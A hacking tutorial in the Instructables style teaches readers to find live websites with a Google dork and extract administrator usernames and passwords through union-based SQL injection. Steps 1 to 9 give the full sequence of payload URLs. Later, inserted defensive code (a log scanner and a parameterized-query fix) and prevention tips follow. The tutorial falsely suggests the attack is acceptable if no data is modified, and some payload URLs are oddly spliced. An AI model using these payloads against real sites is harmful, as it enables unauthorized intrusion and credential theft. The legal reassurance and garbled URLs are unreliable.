Introduction: Guide to Hacking Website Database 101

About: Science, Hacking, Electronics, Programming Is my speed

This short instructable will teach you about "SQL Injection", how to do it, and how to prevent it.
WARNING: I'M NOT RESPONSIBLE IF YOU GET BANNED/REPORTED

1. What is a SQL Injection?

   A SQL injection attacks the security of a website by typing SQL statements into the website to make a badly designed
website dump its database content to the hacker.

2. Is it illegal to do it?
    Of course! If you find a website that is vulnerable, you have to contact the admin before the website gets attacked.
But it will be fine if you don't modify or get personal data.

3. So, why am I teaching how to hack?
   My goal is to show you that SQL Injection is easy and very dangerous. If you follow along, you will notice it is
NOT time consuming either.

Step 1: Using GOOGLE to Search Vulnerable Websites

First, we need to find a website that is vulnerable to SQL Injection.

1) Searching for vulnerable Websites

1. Go to http://www.google.com/

2. In the text box, type in inurl:.php?id=
    => "inurl:" is a search operator that matches text in a website's URL.
         Also, .php?id= is a PHP page that takes an id parameter in its URL, the kind of input that makes SQL Injection possible


3. You will see a bunch of websites that have the .php?id= form. Click them individually and check if each one is vulnerable


2) Check if it's vulnerable to SQL Injection
     Let's say the website you found is http://Vulnerable.com/goodies.php?id=10

The process of checking if it's vulnerable is pretty simple: just add a quote (') to the end of the website URL.
Your URL will be: http://Vulnerable.com/goodies.php?id=10'

If it's vulnerable, it will dump out a MySQL error message like this (or similar):
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


Tip: If the website just loads fine or displays a "404 Page not found" error, that site is not vulnerable

Check the picture above to see some examples

Step 2: Figuring Out the Number of Columns

To access the database, we first need to figure out the number of columns.

We are going to use the command called ORDER BY. This command tells the database which column to order the result by.

To use this command, delete the quote (') that you typed before and type in the command order by 1--
The URL will be: http://Vulnerable.com/goodies.php?id=10 order by 1--
Now, keep increasing the number until we get an error

Tip: The "--" is a double hyphen/minus symbol

[Here is how it works]
http://Vulnerable.com/goodies.php?id=10 order by 1--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 2--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 3--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 4--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 5--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 6--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 7--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 8--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 9--         <= Bingo! We have error "Unknown column '9' in 'order clause'"

We had an error on the ninth try, so there are 8 columns.

Step 3: Checking for Vulnerable Columns

Now we are going to find the vulnerable column using a command called "union all select".

Delete all the commands you typed earlier and type in union all select 1,2,3,4,5,6,7,8--
Before you copy & paste that code in, you need to make a few adjustments to the numbers. For example,
if you have 4 columns, the code will be union all select 1,2,3,4--,
and if you have 7 columns, the code will be union all select 1,2,3,4,5,6,7-- .  You get the idea.

If you entered something wrong, most likely this error will pop up: The used SELECT statements have a different number of columns
If you get this error, you entered the numbers incorrectly.

If everything loads fine, the page will display a number like 2 or 6. This is the vulnerable column.

Tip: If it loads all right, but there are no numbers, try adding "-" (hyphen/minus sign) after the "id=" in the website URL.
Your website URL will look like this:
http://Vulnerable.com/goodies.php?id=-10 union all select 1,2,3,4,5,6,7,8--
This will hopefully load it up.

Step 4: Finding the MySQL Version

Now we need to find the MySQL Version.

In order to get the MySQL version, what you need to do is replace the vulnerable column number (in my case, 2) with version()

So if the vulnerable column is 2, then the complete command/URL will be:
http://Vulnerable.com/goodies.php?id=10 union all select 1,version(),3,4,5,6,7,8

If it displays the version like the picture above, then you're good to go. (This step may be the easiest step.)

Step 5: Getting the Table Names

Now we are going to access the database and pull out some table names.

First, delete the version() command,
replace it with group_concat(table_name) and add some commands so your web address (URL)
will look like this:

http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Now when you hit Enter on your keyboard, the website will display a bunch of table names like the picture above.
Now find the table name that has "admin" in it. This table will include the Admin Username/Password.

Once you have the table name, proceed to the next step

Step 6: Converting Our Table Name Into Hexadecimal Characters

To see the columns, we need to convert our Admin Table name (in my case, nifty_admin) to hexadecimal characters.

To convert our table name to hexadecimal characters, Go to this website.
Once the tool loads, delete everything inside the text box, paste in the Admin Table name and click Convert

The tool will convert the text into hexadecimal characters. Copy the text that is below the word Hex: (Check the picture above)

Step 7: Getting the Column Names

Since we now have our hexadecimal-converted characters, we can finally get the column names.

Go back to your webpage, and replace every table/s with column/s.
Also, at the end, add the command where table_name=0x*Hex*  <= replace *Hex* with your converted hexadecimal characters
Your web address will now look like this:

http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x6e696674795f61646d696e--

When you hit Enter, the page will display columns like the picture above. Find the column names of the Username and Password
(In my case, the column name of Username was admin, and the column name of Password was pass)

Step 8: Finding the Administrator's Username and Password - Part 1

Now we are going to find the Username and Password

This is the final stage. Delete the commands that are in bold:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x6e696674795f61646d696e--

Here is the Web Address you are left with:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(),3,4,5,6,7,8 from

Now, between the brackets of the group_concat() command, type in the following:
*Username_Column*, 0x20616e6420, *Password_Column*

Make sure to replace *Username_Column* with your Username column name and *Password_Column* with your Password column name (In my case, admin is the username column name and pass is the password column name)

Your web address will now look something like this:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(*Username_Column*, 0x20616e6420, *Password_Column*),3,4,5,6,7,8 from

Step 9: Finding the Administrator's Username and Password - Part 2

Now we are going to display the Username & Password

Once you have typed in *Username_Column*, 0x20616e6420, *Password_Column* between the group_concat brackets,
we have to add the host table name.

After the from command, type in the Admin Table name that you got in Step 5. (In my case, my Admin Table name is nifty_admin)
Make sure you type the Admin Table name in English, NOT hexadecimal characters.

Now the complete web address will finally look like this:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(*Username_Column*, 0x20616e6420, *Password_Column*),3,4,5,6,7,8 from *Admin_Table_Name*
Make sure you replace *Admin_Table_Name* with your Admin Table name, along with *Username_Column* and *Password_Column*

If you hit Enter, you will see the Username and Password like the picture above.
Congratulations! You've successfully hacked into a MySQL Database!

Note: The Username & Password you see above are OUTDATED. They won't work.
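
From the defender's side, the requests in Steps 1 to 9 leave a recognizable trail in the web server's access log. The following is an added example, not part of the original instructable: it scans constructed log lines for those request shapes, and the rule names, sample addresses and paths are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request shapes from Steps 1 to 9; the rule names are this example's own.
RULES = [
    ("trailing-quote", re.compile(r"'\s*$")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("trailing-comment", re.compile(r"--\s*$")),
]
# Common log format: client, ident, user, [time], "METHOD url PROTOCOL"
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the rule names matched by any decoded query-string value."""
    hits = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES if rx.search(value))
    return hits

def scan(log_lines):
    """Map each client address to the rule names seen across its requests."""
    findings = {}
    for line in log_lines:
        m = REQUEST.match(line)
        hits = classify(m.group(2)) if m else set()
        if hits:
            findings.setdefault(m.group(1), set()).update(hits)
    return findings

def suspects(findings, min_rules=2):
    """Clients that tripped several distinct rules: a probe sequence, not a typo."""
    return sorted(c for c, rules in findings.items() if len(rules) >= min_rules)

# Constructed sample log: documentation IP ranges, hypothetical paths.
T = "[10/Oct/2023:13:55:01 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {T} "GET /goodies.php?id=10%27 HTTP/1.1" 500 310',
    f'203.0.113.7 - - {T} "GET /goodies.php?id=10%20order%20by%209-- HTTP/1.1" 500 310',
    f'203.0.113.7 - - {T} "GET /goodies.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,8-- HTTP/1.1" 200 900',
    f'203.0.113.7 - - {T} "GET /goodies.php?id=-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables-- HTTP/1.1" 200 2048',
    f'198.51.100.20 - - {T} "GET /search.php?q=order+by+price HTTP/1.1" 200 700',
    f'192.0.2.44 - - {T} "GET /search.php?q=dogs%27 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for client, rules in sorted(scan(SAMPLE_LOG).items()):
        print(client, sorted(rules))
```

A single rule hit (the lone trailing quote from 192.0.2.44) is recorded but not escalated; only a client that trips several rules is returned by suspects().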

Step 10: Preventing SQL Injection

Now that we have learned the basic principle of SQL injection, let's prevent it.

Here are a few basic blocking techniques & tips you can use on your SQL code:

1. Install the GreenSQL database firewall.
GreenSQL is an open source database firewall that can automatically block the commands load_file and INTO OUTFILE.
By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example, the UNION token and SQL comments are taken into account. Check the application website for more information: GreenSQL

2. Do not use the MySQL root user to access the database.
Do not use administrative users to access the database. It is recommended that you create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.
mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';
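
The measures above limit what an injected query can do; the injection itself goes away when the application stops building SQL text from request parameters. The following is an added example, not from the original instructable: it uses Python's sqlite3 as a stand-in for the PHP/MySQL site, and the goodies table, its data and the function names are assumptions.

```python
import re
import sqlite3

def make_db():
    """In-memory SQLite stand-in for the site's MySQL database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE goodies (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO goodies VALUES (10, 'widget')")
    return db

def lookup_vulnerable(db, raw_id):
    """The flaw Steps 1 to 9 rely on: the id parameter becomes part of the SQL text."""
    return db.execute("SELECT id, name FROM goodies WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    """Validate the type, then bind the value so it can never be parsed as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # caller should answer 400 without echoing any database error
    return db.execute("SELECT id, name FROM goodies WHERE id = ?", (int(raw_id),)).fetchall()

def outcome(lookup, raw_id):
    """Run one lookup against a fresh database; report rows, None, or 'sql-error'."""
    try:
        return lookup(make_db(), raw_id)
    except sqlite3.Error:
        return "sql-error"

# id values shaped like this page's URLs (2-column variants of Steps 1 to 3).
PAGE_INPUTS = ["10", "10'", "10 order by 3--", "-10 union all select 1,2--"]

if __name__ == "__main__":
    for raw in PAGE_INPUTS:
        print(repr(raw), outcome(lookup_vulnerable, raw), outcome(lookup_hardened, raw))
```

The bound parameter is the actual fix; the integer check is an extra layer that also keeps malformed input from ever reaching the database.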


For More Information, Visit:
SQL Injection Cheat Sheet
MySQL Documentation



Thanks for taking the time to read this instructable, God Bless!